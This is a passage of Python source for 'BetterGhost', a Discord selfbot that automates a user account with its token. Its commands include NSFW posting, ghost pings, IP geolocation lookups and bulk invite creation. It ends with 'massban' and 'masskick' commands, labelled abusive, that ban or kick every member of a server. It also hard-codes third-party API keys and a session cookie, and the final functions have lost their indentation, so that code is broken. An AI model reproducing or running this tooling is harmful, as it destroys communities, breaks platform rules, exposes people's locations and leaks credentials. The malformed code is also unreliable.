        await ctx.send(f"Couldnt find `{type}` detection.")
@BetterGhost.command(name="disabledetect", description="Disable a detection.", usage="disabledetect [type]", aliases=["disabledetection", "disabledetections"])
async def disabledetect(ctx, *, type):
    """Turn off the detection whose name matches `type` (case-insensitive)."""
    cfg = Config.getConfig()
    wanted = type.lower()
    matched = [key for key in cfg["detections"] if key.lower() == wanted]
    for key in matched:
        cfg["detections"][key] = False
        Config.saveConfig(cfg)
    if matched:
        await ctx.send(f"Disabled `{type}` detection.")
    else:
        await ctx.send(f"Couldnt find `{type}` detection.")
@BetterGhost.command(name="enablesniper", description="Enable a sniper.", usage="enablesniper [type]", aliases=["enablesnipers"])
async def enablesniper(ctx, *, type):
    """Turn on the sniper whose name matches `type` (case-insensitive)."""
    cfg = Config.getConfig()
    wanted = type.lower()
    matched = [key for key in cfg["snipers"] if key.lower() == wanted]
    for key in matched:
        cfg["snipers"][key] = True
        Config.saveConfig(cfg)
    if matched:
        await ctx.send(f"Enabled `{type}` sniper.")
    else:
        await ctx.send(f"Couldnt find `{type}` sniper.")
@BetterGhost.command(name="disablesniper", description="Disable a sniper.", usage="disablesniper [type]", aliases=["disablesnipers"])
async def disablesniper(ctx, *, type):
    """Turn off the sniper whose name matches `type` (case-insensitive)."""
    cfg = Config.getConfig()
    wanted = type.lower()
    matched = [key for key in cfg["snipers"] if key.lower() == wanted]
    for key in matched:
        cfg["snipers"][key] = False
        Config.saveConfig(cfg)
    if matched:
        await ctx.send(f"Disabled `{type}` sniper.")
    else:
        await ctx.send(f"Couldnt find `{type}` sniper.")
# @BetterGhost.command(name="ghostusers", description="Finds all the people using BetterGhost in a server.", usage="ghostusers")
# @commands.guild_only()
# async def ghostusers(ctx):
# message = await ctx.send("Looking for people that have BetterGhost, this may take a while...")
# ghostUsers = []
# userAgent = get_random_user_agent()
# try:
# await ctx.message.delete()
# except:
# pass
# DiscumClient = discum.Client(token=__token__, user_agent=f"{userAgent}")
# @DiscumClient.gateway.command
# def getmembers(resp):
# guild_id = f'{ctx.guild.id}'
# channel_id = f'{ctx.channel.id}'
# if resp.event.ready_supplemental:
# DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
# if DiscumClient.gateway.finishedMemberFetching(guild_id):
# DiscumClient.gateway.removeCommand(getmembers)
# DiscumClient.gateway.close()
# DiscumClient.gateway.run()
# for memberID in DiscumClient.gateway.session.guild(f'{ctx.guild.id}').members:
# member = await ctx.guild.fetch_member(int(memberID))
# ghostguild = await BetterGhost.fetch_guild(838869729829191681)
# mutualGuilds = member.mutual_guilds
# for guild in mutualGuilds:
# print(guild.name)
# DiscumClient.gateway.close()
# if __embedmode__:
# embed=discord.Embed(
# title="BetterGhost Users",
# description=f"There are a total of `{len(ghostUsers)}` BetterGhost users in `{ctx.guild.name}`\n \n```\n" + ", ".join(ghostUsers) + f"\n```",
# color=__embedcolour__
# )
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await message.edit(content="", embed=embed)
# else:
# await message.edit(content=f"""```ini
# [ BetterGhost Users ]
# There is a total of {len(ghostUsers)} in {ctx.guild.name}.
# {', '.join(ghostUsers)}
# # {__embedfooter__}
# ```""")
@BetterGhost.command(name="addccmd", description="Add a custom command.", usage="addccmd [name] [response]", aliases=["addcustomcommand"])
async def addccmd(ctx, name, *, response):
    """Register a custom command: stores `name` -> `response` in customcommands.json
    and refreshes the in-memory `ccmd` cache."""
    global ccmd
    # Context managers close the file handles (the old code opened three files
    # and never closed any of them).
    with open("customcommands.json") as f:
        customCommands = json.load(f)
    customCommands[name] = response
    with open("customcommands.json", "w") as f:
        json.dump(customCommands, f, indent=4, sort_keys=False)
    # We just wrote this dict, so there is no need to re-read the file.
    ccmd = customCommands
    await ctx.send(f"Added `{BetterGhost.command_prefix}{name}` to your custom commands.", delete_after=__deletetimeout__)
@BetterGhost.command(name="delccmd", description="Remove a custom command.", usage="delccmd [name]", aliases=["deletecustomcommand", "delcustomcommand", "removecustomcommand", "removeccmd", "deleteccmd"])
async def delccmd(ctx, name):
    """Delete a custom command from customcommands.json and refresh the cache."""
    global ccmd
    with open("customcommands.json") as f:
        customCommands = json.load(f)
    # BUG FIX: pop() on a missing name raised an uncaught KeyError and the
    # command died silently; report it to the user instead.
    if name not in customCommands:
        await ctx.send(f"Couldnt find a custom command named `{name}`.", delete_after=__deletetimeout__)
        return
    del customCommands[name]
    with open("customcommands.json", "w") as f:
        json.dump(customCommands, f, indent=4, sort_keys=False)
    ccmd = customCommands
    await ctx.send(f"Removed `{BetterGhost.command_prefix}{name}` from your custom commands", delete_after=__deletetimeout__)
@BetterGhost.command(name="boobs", description="Pictures or videos of boobs.", usage=f"boobs", aliases=["tits", "tit", "milkers", "titties", "boob"])
async def boobs(ctx):
    """Fetch a random NSFW image/video and post it.

    Image links are embedded when embed mode is on; videos (or embed mode off)
    are sent as a plain link.
    """
    type = "boobs"
    image = get_nsfw(type)
    # str.endswith accepts a tuple — one call instead of four chained `or`s.
    if image.endswith(("png", "jpeg", "jpg", "gif")):
        # CONSISTENCY FIX: the sibling commands (ass/pussy/porngif) honour
        # __embedmode__ here; this one unconditionally embedded.
        if __embedmode__:
            embed = discord.Embed(title=f"{type}", color=__embedcolour__)
            embed.set_image(url=image)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send(image)
    else:
        await ctx.send(image)
@BetterGhost.command(name="ass", description="Pictures or videos of ass.", usage=f"ass")
async def ass(ctx):
    """Fetch a random NSFW image/video and post it (embed for images when
    embed mode is on, plain link otherwise)."""
    type = "ass"
    image = get_nsfw(type)
    # str.endswith accepts a tuple — one call instead of four chained `or`s.
    if image.endswith(("png", "jpeg", "jpg", "gif")):
        if __embedmode__:
            embed = discord.Embed(title=f"{type}", color=__embedcolour__)
            embed.set_image(url=image)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send(image)
    else:
        await ctx.send(image)
@BetterGhost.command(name="pussy", description="Pictures or videos of pussy.", usage=f"pussy")
async def pussy(ctx):
    """Fetch a random NSFW image/video and post it (embedded only for image
    links while embed mode is on)."""
    type = "pussy"
    image = get_nsfw(type)
    is_image = any(image.endswith(ext) for ext in ("png", "jpeg", "jpg", "gif"))
    if is_image and __embedmode__:
        embed = discord.Embed(title=f"{type}", color=__embedcolour__)
        embed.set_image(url=image)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed)
    else:
        await ctx.send(image)
@BetterGhost.command(name="porngif", description="Porn gifs.", usage=f"porngif")
async def porngif(ctx):
    """Fetch a random NSFW gif/video and post it, embedding image links when
    embed mode is enabled."""
    type = "porngif"
    image = get_nsfw(type)
    # Plain link when it's not an image extension, or when embeds are disabled.
    if not image.endswith(("png", "jpeg", "jpg", "gif")) or not __embedmode__:
        await ctx.send(image)
        return
    embed = discord.Embed(title=f"{type}", color=__embedcolour__)
    embed.set_image(url=image)
    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
    embed.timestamp = datetime.now()
    await ctx.send(embed=embed)
@BetterGhost.command(name="hentai", description="Pictures or videos of hentai.", usage=f"hentai")
async def hentai(ctx):
    """Fetch a random hentai image/gif from one of two nekos.life endpoints."""
    # Data-driven endpoint selection replaces the old randint + if/elif chain,
    # which would have left `image` undefined if neither branch matched.
    endpoints = (
        ("https://nekos.life/api/lewd/neko", "neko"),
        ("https://nekos.life/api/v2/img/nsfw_neko_gif", "url"),
    )
    url, key = random.choice(endpoints)
    image = requests.get(url).json()[key]
    if __embedmode__:
        embed = discord.Embed(title=f"hentai", color=__embedcolour__)
        embed.set_image(url=image)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed)
    else:
        await ctx.send(image)
@BetterGhost.command(name="discordtheme", description="Change default Discord theme.", usage="discordtheme [light/dark]")
async def discordtheme(ctx, theme = "dark"):
    """Switch the account's Discord client theme (dark/light) via discum."""
    theme = theme.lower()
    if theme not in ("dark", "light"):
        await ctx.send("That isn't a valid Discord theme.", delete_after=__deletetimeout__)
        return
    client = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
    client.setTheme(theme)
    await ctx.send(f"Set Discord theme to `{theme}`.", delete_after=__deletetimeout__)
@BetterGhost.command(name="changehypesquad", description="Change your hypesquad house.", usage="changehypesquad [bravery/brilliance/balance]")
async def changehypesquad(ctx, house):
    """Change the account's hypesquad house via discum."""
    house = house.lower()
    if house in ("bravery", "brilliance", "balance"):
        DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
        DiscumClient.setHypesquad(house)
        # `house` is already lower-cased, so the old slice-and-case expression
        # was just str.capitalize().
        await ctx.send(f"Changed your hypesquad house to `{house.capitalize()}`.", delete_after=__deletetimeout__)
    else:
        await ctx.send("That isn't a valid hypesquad house.", delete_after=__deletetimeout__)
@BetterGhost.command(name="backupfriends", description="Backup all your friend's user IDs to a file.", usage="backupfriends", aliases=["friendbackup"])
async def backupfriends(ctx):
    """Back up the account's friends, blocked users and pending friend requests
    (IDs + tags) to data/friends.txt."""
    print_info("Grabbing all friends...")
    request = requests.get("https://discord.com/api/v6/users/@me/relationships", headers={"authorization": __token__})
    # Renamed from `json`: the old local shadowed the imported json module.
    relationships = request.json()
    ids = []
    blockedIds = []
    incoming = []
    outgoing = []
    # Relationship type -> (destination list, console label).
    # Discord relationship types: 1=friend, 2=blocked, 3=incoming, 4=outgoing.
    buckets = {
        1: (ids, "Backed up {}!"),
        2: (blockedIds, "Backed up a blocked user : {}"),
        3: (incoming, "Backed up an incoming friend request : {}"),
        4: (outgoing, "Backed up an outgoing friend request : {}"),
    }
    for item in relationships:
        bucket = buckets.get(item["type"])
        if bucket is None:
            continue
        target, label = bucket
        tag = str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])
        print_info(label.format(tag))
        target.append(str(item["id"]) + " : " + tag)
    print_info("Backed up all friends!")
    await ctx.send(f"Backed up a total of `{len(ids)}` friends, `{len(blockedIds)}` blocked, `{len(outgoing)}` outgoing friend requests and `{len(incoming)}` incoming friend requests to __data/friends.txt__.", delete_after=__deletetimeout__)
    # Placeholder lines so empty sections still render in the output file.
    if not ids:
        ids.append("Couldnt find any friends.")
    if not blockedIds:
        blockedIds.append("Couldnt find any blocked users.")
    if not outgoing:
        outgoing.append("Couldnt find any outgoing friend requests.")
    if not incoming:
        incoming.append("Couldnt find any incoming friend requests.")
    # Context manager closes the file even if write() raises (the old code
    # leaked the handle on exceptions).
    with codecs.open("data/friends.txt", "w", encoding="utf-8") as file:
        file.write(
            "Current Friends\n===============\n" + "\n".join(ids) +
            "\n \nOutgoing Requests\n=================\n" + "\n".join(outgoing) +
            "\n \nIncoming Requests\n=================\n" + "\n".join(incoming) +
            "\n \nBlocked Users\n=============\n" + "\n".join(blockedIds)
        )
@BetterGhost.command(name="backupservers", description="Backup all your servers and try to create invites for each one.", usage="backupservers", aliases=["backupguilds", "serverbackup", "guildbackup"])
async def backupservers(ctx):
    # Write "name : id : discord.gg/<code-or-failure-note>" for every guild the
    # account is in to data/servers.txt, creating one invite per guild via discum.
    DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
    try:
        # Best-effort removal of the invoking message.
        await ctx.message.delete()
    except:
        pass
    print_info("Saving and creating invites for your guilds with a 4 second interval...")
    guilds = requests.get("https://discordapp.com/api/v6/users/@me/guilds", headers={"authorization": __token__}).json()
    print_info("Grabbing all the guilds...")
    guildsIdsAndInvites = []
    for item in guilds:
        guildid = item["id"]
        guildname = item["name"]
        invite = ""  # "" means "no invite obtained yet" throughout this loop
        print_info(f"Trying to create invite for {guildname}")
        server = discord.utils.get(BetterGhost.guilds, id=int(guildid))
        for channel in server.text_channels:
            if invite == "":
                # createInvite returns an HTTP response; on 200 we keep only the code.
                invite = DiscumClient.createInvite(str(channel.id))
                if invite.status_code == 200:
                    invite = invite.json()["code"]
                else:
                    # NOTE(review): a single failed channel aborts the whole guild
                    # via `break` instead of trying the next channel — confirm
                    # this is intended.
                    invite = ""
                    break
        if invite == "":
            invite = "Failed to create an invite."
        guildsIdsAndInvites.append(item["name"] + " : " + str(item["id"]) + " : discord.gg/" + str(invite))
        # Pause between guilds to reduce rate-limit pressure.
        await asyncio.sleep(4)
    print_info(f"Saved guilds data.")
    file = codecs.open("data/servers.txt", "w", encoding="utf-8")
    file.write("\n".join(guildsIdsAndInvites))
    file.close()
    await ctx.send("Saved a list of all your guilds and their IDs in __data/servers.txt__.", delete_after=__deletetimeout__)
@BetterGhost.command(name="richpresence", description="Enable or disable rich presence.", usage="richpresence [on/off]", aliases=["rpc"])
async def richpresence(ctx, status):
    """Toggle the `enabled` flag in richpresence.json and restart the bot.

    Accepts "on"/"off" in any case (the old code matched only on/On and off/Off
    and silently did nothing otherwise).
    """
    status = status.lower()
    if status not in ("on", "off"):
        # Tell the user instead of silently ignoring bad input.
        await ctx.send("Usage: richpresence [on/off]", delete_after=__deletetimeout__)
        return
    enabled = status == "on"
    # Deduplicated the two nearly-identical branches; `with` closes the handles
    # the old open() calls leaked.
    with open("richpresence.json") as f:
        richpresence = json.load(f)
    richpresence["enabled"] = enabled
    with open('richpresence.json', 'w') as f:
        json.dump(richpresence, f, sort_keys=False, indent=4)
    state = "enabled" if enabled else "disabled"
    await ctx.send(f"Rich presence has been {state}, restarting to change effect...", delete_after=__deletetimeout__)
    restart_bot()
@BetterGhost.command(name="spacechannel", description="Create a channel with spaces.", usage="spacechannel [channel name]")
async def spacechannel(ctx, *, channelName = "example channel name"):
    """Create a text channel whose spaces are replaced by the blank-looking
    channel character, then confirm to the user."""
    channelName = channelName.replace(" ", channelBlankChar)
    await ctx.guild.create_text_channel(name=channelName)
    if not __embedmode__:
        await ctx.send(f"""```ini
[ Space Channel ]
Created a channel with the name {channelName}.
# {__embedfooter__}
```""")
        return
    embed = discord.Embed(
        title=f"Space Channel",
        description=f"Created a channel with the name `{channelName}`.",
        color=__embedcolour__,
    )
    embed.set_thumbnail(url=__embedimage__)
    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
    embed.timestamp = datetime.now()
    await ctx.send(embed=embed, delete_after=__deletetimeout__)
@BetterGhost.command(name="uwu", description="Translate your messages to uwu!", usage="uwu [message]")
async def uwu__(ctx, *, message):
    """Reply with the uwu-fied version of the given message."""
    await ctx.send(uwuify.uwu(message))
@BetterGhost.command(name="uwuify", description="Automatically translate all your sent messages to uwu!", usage="uwuify")
async def uwuify__(ctx):
    """Toggle automatic uwu translation of every sent message."""
    global uwuifyEnabled
    # Idiomatic toggle instead of the if/else pair of assignments.
    uwuifyEnabled = not uwuifyEnabled
    if uwuifyEnabled:
        await ctx.send("All your messages will now be translated to uwu.", delete_after=__deletetimeout__)
    else:
        await ctx.send("All your messages will no longer be translated to uwu.", delete_after=__deletetimeout__)
@BetterGhost.command(name="geoip", description="Get information from an IP address.", usage="geoip [ip]", aliases=["iplookup", "lookupip", "ipinfo"])
async def geoip(ctx, ip):
    # Look up geolocation/ISP details for `ip` via ip-api.com, plus VPN flag and
    # hostname via ipqualityscore.com, and reply as an embed or ```ini``` text.
    # NOTE(review): the ipqualityscore API key is hard-coded in the URL below and
    # neither request sets a timeout — consider moving the key to config.
    data = requests.get(f"http://ip-api.com/json/{ip}").json()
    data2 = requests.get(f"https://ipqualityscore.com/api/json/ip/oOswzMILsf8QA7JGtaQDdXARfDtbKW1K/{ip}").json()
    country = data["country"]
    city = data["city"]
    zipCode = data["zip"]
    lat = data["lat"]
    lon = data["lon"]
    isp = data["isp"]
    as1 = data["as"]  # autonomous-system field; named as1 because `as` is a keyword
    region = data["regionName"]
    vpn = data2["vpn"]
    hostname = data2["host"]
    if __embedmode__:
        embed = discord.Embed(title=f"{ip} information...", color=__embedcolour__)
        embed.add_field(name="Country", value=f"```{country}```", inline=False)
        embed.add_field(name="City", value=f"```{city}```", inline=True)
        embed.add_field(name="Region", value=f"```{region}```", inline=True)
        embed.add_field(name="ZIP", value=f"```{zipCode}```", inline=True)
        embed.add_field(name="LAT", value=f"```{lat}```", inline=True)
        embed.add_field(name="LON", value=f"```{lon}```", inline=True)
        embed.add_field(name="VPN", value=f"```{vpn}```", inline=True)
        embed.add_field(name="AS", value=f"```{as1}```", inline=False)
        embed.add_field(name="ISP", value=f"```{isp}```", inline=False)
        embed.add_field(name="Hostname", value=f"```{hostname}```", inline=False)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"""```ini
[ {ip} information.. ]
Country: {country}
City: {city}
Region: {region}
ZIP: {zipCode}
LAT: {lat}
LON: {lon}
VPN: {vpn}
AS: {as1}
ISP: {isp}
Hostname: {hostname}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="invite", description="Get BetterGhost's Discord server invite link.", usage="invite")
async def invite(ctx):
    """Print the BetterGhost support-server invite link to the console."""
    print_info(f"Discord server invite: {discordServer}")
@BetterGhost.command(name="pytoexe", description="Convert a PY file to an executable.", usage="pytoexe [path]", aliases=["pythontoexe", "py2exe", "python2exe"])
async def pytoexe(ctx, *, path):
    """Compile the given .py file into a single-file executable via pyinstaller,
    writing the result to pytoexe/<name>.exe."""
    import subprocess  # local import: only this command needs it
    file = path.split("/")[-1]
    if file.endswith(".py"):
        file = file[:-3]  # drop ".py" to get the executable name
        if __embedmode__:
            embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has started, check the console for more information.", color=__embedcolour__)
            embed.set_thumbnail(url=__embedimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            message = await ctx.send(embed=embed)
        else:
            message = await ctx.send(f"""```ini
[ PY To Executable ]
Conversion for your file has started, check the console for more information.
# {__embedfooter__}
```""")
        print_info("Converting your file to an exe using pyinstaller...\nThis will fill your console and possibly take a while.")
        # SECURITY FIX: run pyinstaller with an argument list instead of
        # os.system — the old call interpolated the unquoted user-supplied path
        # into a shell command, so spaces or metacharacters broke it / allowed
        # shell injection.
        subprocess.run(["pyinstaller", "-n", file, "-i", "icon.ico", "--onefile", "--distpath", "pytoexe/", path])
        print_info("Conversion complete!")
        print(f"{fg.cYellow}Path: {fg.cGrey}pytoexe/{file}.exe")
        if __embedmode__:
            embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has completed! Check the console for more information.", color=__embedcolour__)
            embed.set_thumbnail(url=__embedimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await message.edit(content="", embed=embed)
        else:
            # Typo fix in the user-facing message: "Converstion" -> "Conversion".
            await message.edit(content=f"""```ini
[ PY To Executable ]
Conversion for your file has completed! Check the console for more information.
# {__embedfooter__}
```""")
    else:
        if __embedmode__:
            embed = discord.Embed(title=f"PY To Executable", description="The path you submitted does not link to a PY file.", color=__embedcolour__)
            embed.set_thumbnail(url=__embedimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send(f"""```ini
[ PY To Executable ]
The path you submitted does not link to a PY file.
# {__embedfooter__}
```""")
@BetterGhost.command(name="statuscycle", description="Start a custom status cycle.", usage="statuscycle", aliases=["cyclestatus"])
async def statuscycle(ctx):
    """Toggle cycling the account's custom status through the words of
    cycleStatusText, one word per second."""
    global cycleStatus
    cycleStatus = not cycleStatus  # idiomatic toggle
    def changeStatus(text2, token):
        # PATCH the custom status via the raw settings endpoint.
        url = "https://discordapp.com/api/v8/users/@me/settings"
        # BUG FIX: build the payload with json.dumps — the old hand-concatenated
        # JSON string produced invalid JSON whenever the status word contained a
        # quote or backslash.
        payload = json.dumps({"custom_status": {"text": text2}})
        headers = {
            'Authorization': token,
            'Content-Type': 'application/json',
            'Cookie': '__cfduid=d7e8d2784592da39fb3f621664b9aede51620414171; __dcfduid=24a543339247480f9b0bb95c710ce1e6'
        }
        requests.request("PATCH", url, headers=headers, data=payload)
    async def loopStatus(text):
        # Runs until cycleStatus is flipped off by a later invocation.
        while cycleStatus is True:
            for word in text.split(" "):
                changeStatus(word, __token__)
                await asyncio.sleep(1)
    if cycleStatus:
        # Only spawn the looper when enabling (the old code also created a
        # no-op task when disabling).
        BetterGhost.loop.create_task(loopStatus(cycleStatusText))
        await ctx.send(f"Now looping your custom status.", delete_after=__deletetimeout__)
    else:
        await ctx.send(f"No longer looping your custom status.", delete_after=__deletetimeout__)
@BetterGhost.command(name="statuscycletext", description="Set the text used in status cycle.", usage="statuscycletext [text]", aliases=["cyclestatustext"])
async def statuscycletext(ctx, *, text: str):
    """Store the text that the statuscycle command loops through."""
    global cycleStatusText
    cycleStatusText = text
    await ctx.send(f"Status cycle text set to `{text}`", delete_after=__deletetimeout__)
@BetterGhost.command(name="ghostping", description="Ping a user then delete the message.", usage="ghostping [@user]")
async def ghostping(ctx, user: discord.User):
    # Intentionally empty: the invoking message itself contains the mention.
    # NOTE(review): presumably the invoking message is deleted elsewhere (e.g. a
    # global command handler) — confirm, otherwise this command does nothing.
    pass
@BetterGhost.command(name="getmessage", description="Get a message by ID.", usage="getmessage [message id]", aliases=["fetchmessage"])
async def getmessage(ctx, messageid: int):
    """Fetch a message by ID and show its content, author and jump link."""
    msg = await ctx.send("Getting the message . . .")
    message = await get_message(ctx, messageid)
    if not __embedmode__:
        await msg.edit(content=f"""```ini
[ Get Message ]
Content: {message.content}
Author: {message.author}
Message Link: {message.jump_url}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
        return
    embed = discord.Embed(title=f"Get Message", color=__embedcolour__)
    embed.add_field(name="Content", value=f"```{message.content}```", inline=True)
    embed.add_field(name="Author", value=f"```{message.author}```", inline=True)
    embed.add_field(name="Message Link", value=message.jump_url, inline=False)
    embed.set_thumbnail(url=__embedimage__)
    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
    embed.timestamp = datetime.now()
    await msg.edit(content="", embed=embed, delete_after=__deletetimeout__)
@BetterGhost.command(name="watchdogstats", description="Get stats about Hypixel's Anticheat, Watchdog", usage="watchdogstats")
async def watchdogstats(ctx):
    """Query Hypixel's punishment-stats endpoint and report Watchdog ban counts."""
    # NOTE: the Hypixel API key is hard-coded into this URL.
    data = requests.get("https://api.hypixel.net/punishmentstats?key=591c390d-6e97-4b39-abb3-ef3fb386aff0").json()
    if not __embedmode__:
        await ctx.send(f"""```ini
[ Watchdog Stats ]
Total Bans: {data['watchdog_total']}
Last Minute: {data['watchdog_lastMinute']}
Daily Bans: {data['watchdog_rollingDaily']}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
        return
    embed = discord.Embed(title=f"Watchdog Stats", color=__embedcolour__)
    for label, key in (("Total Bans", "watchdog_total"), ("Last Minute", "watchdog_lastMinute"), ("Daily Bans", "watchdog_rollingDaily")):
        embed.add_field(name=label, value="```" + str(data[key]) + "```", inline=True)
    embed.set_thumbnail(url=__embedimage__)
    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
    embed.timestamp = datetime.now()
    await ctx.send(embed=embed, delete_after=__deletetimeout__)
@BetterGhost.command(name="ppin", description="Add a message to your personal pins.", usage="ppin [message id]", aliases=["personalpin", "addppin", "addpersonalpin"])
async def ppin(ctx, msgId: int):
    """Save a message's content and author into data/personal-pins.json."""
    message = await get_message(ctx, msgId)
    # `with` closes the handles the old bare open() calls leaked.
    with open("data/personal-pins.json") as f:
        data = json.load(f)
    # JSON object keys become strings on dump, which is why ppindel looks pins
    # up by a str id.
    data[msgId] = {
        "content": message.content,
        "author": f"{message.author.name}#{message.author.discriminator}",
    }
    with open("data/personal-pins.json", 'w') as f:
        json.dump(data, f, sort_keys=False, indent=4)
    if __embedmode__:
        embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Pinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"**📌 Personal Pin**\nPinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
@BetterGhost.command(name="ppins", description="List all your pinned messages.", usage="ppins", aliases=["personalpins"])
async def ppins(ctx):
    """List every personal pin stored in data/personal-pins.json."""
    # `with` closes the handle the old bare open() leaked.
    with open("data/personal-pins.json") as f:
        data = json.load(f)
    # join over items() instead of += string building in a loop.
    ppinsMsg = "".join(
        f"\n__{pinId}__ :\n** **- Content : `{pin['content']}`\n** **- Author : `{pin['author']}`"
        for pinId, pin in data.items()
    )
    if __embedmode__:
        embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=ppinsMsg)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"**Personal Pins**\n{ppinsMsg}")
@BetterGhost.command(name="ppindel", description="Delete a pin from your personal pins.", usage="ppindel [pin id]", aliases=["ppindelete", "removeppin", "deleteppin", "personalpindelete", "deletepersonalpin", "removepersonalpin"])
async def ppindel(ctx, pinId: str):
    """Remove a pin (by string id) from data/personal-pins.json."""
    with open("data/personal-pins.json") as f:
        data = json.load(f)
    # BUG FIX: `del` on a missing id raised an uncaught KeyError; report it.
    if pinId not in data:
        await ctx.send(f"Couldnt find a pin with ID `{pinId}`.", delete_after=__deletetimeout__)
        return
    del data[pinId]
    with open("data/personal-pins.json", 'w') as f:
        json.dump(data, f, sort_keys=False, indent=4)
    if __embedmode__:
        # Message fix: past tense — the pin has already been deleted here.
        embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Deleted pin `{pinId}`.")
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"**Personal Pin**\nDeleted pin `{pinId}`.")
@BetterGhost.command(name="countdown", description="Count down from a number.", usage="countdown [number]")
async def countdown(ctx, number: int):
    """Send each value from `number` down to 1 as its own message."""
    remaining = number
    while remaining > 0:
        await ctx.send(remaining)
        remaining -= 1
@BetterGhost.command(name="countup", description="Count up from a number.", usage="countup [number]")
async def countup(ctx, number: int):
    """Send 1 through `number` as individual messages.

    BUG FIX: the old `range(number)` counted 0..number-1 — it started at 0 and
    never reached `number`, unlike countdown which covers number..1.
    """
    for count in range(1, number + 1):
        await ctx.send(count)
@BetterGhost.command(name="massban", description="Ban all the members in the command server.", usage="massban")
async def massban(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.ban()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="masskick", description="Kick all the members in the command server.", usage="masskick")
async def masskick(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.kick()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
